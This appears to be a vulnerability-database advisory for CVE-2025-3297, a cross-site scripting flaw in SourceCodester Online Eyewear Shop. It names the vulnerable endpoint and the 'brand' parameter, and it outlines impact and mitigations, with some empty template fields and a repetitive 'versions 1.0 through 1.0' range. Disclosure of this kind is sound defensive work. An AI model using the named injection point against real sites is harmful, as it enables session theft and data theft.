A problematic cross-site scripting (XSS) vulnerability has been identified in SourceCodester Online Eyewear Shop versions 1.0 through 1.0. This vulnerability allows attackers to inject malicious scripts into the application, potentially compromising user sessions and data. The vulnerability resides within the /classes/Master.php?f=save_product file, specifically through manipulation of the 'brand' parameter. A patch is available in version 1.0.1.
Successful exploitation of CVE-2025-3297 allows an attacker to inject arbitrary JavaScript code into the Online Eyewear Shop application. This can lead to various malicious outcomes, including session hijacking, defacement of the website, and redirection of users to phishing sites. The attacker could steal sensitive user data, such as login credentials or payment information. Given the nature of XSS, the impact can be significant, potentially affecting all users who interact with the vulnerable page. The attack can be launched remotely, increasing the potential attack surface.
This vulnerability has been publicly disclosed, increasing the risk of exploitation. While the CVSS score is LOW, the ease of exploitation and potential impact warrant immediate attention. No known active campaigns targeting this specific vulnerability have been reported as of the publication date. The vulnerability is not currently listed on the CISA KEV catalog.
Exploit Status
EPSS
0.21% (43% percentile)
CISA SSVC
CVSS Vector
The primary mitigation for CVE-2025-3297 is to upgrade to version 1.0.1 of the Online Eyewear Shop. If upgrading immediately is not feasible, consider implementing input validation and output encoding on the 'brand' parameter within the /classes/Master.php?f=save_product file. Web application firewalls (WAFs) configured to detect and block XSS payloads can also provide a temporary layer of protection. Thoroughly review and sanitize all user-supplied input to prevent further XSS vulnerabilities.
Update to a patched version of the software. Contact the vendor for a corrected version or apply necessary security measures to prevent manipulation of the 'brand' parameter and other vulnerable parameters. Validate and sanitize user inputs to prevent XSS attacks.
Vulnerability analysis and critical alerts directly to your inbox.
CVE-2025-3297 is a cross-site scripting (XSS) vulnerability in SourceCodester Online Eyewear Shop versions 1.0–1.0, allowing attackers to inject malicious scripts.
You are affected if you are using SourceCodester Online Eyewear Shop version 1.0–1.0 and have not upgraded to version 1.0.1.
Upgrade to version 1.0.1. As a temporary measure, implement input validation and output encoding on the 'brand' parameter.
While no active campaigns have been confirmed, the vulnerability has been publicly disclosed, increasing the risk of exploitation.
Refer to the SourceCodester website or relevant security advisories for the official advisory regarding CVE-2025-3297.
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.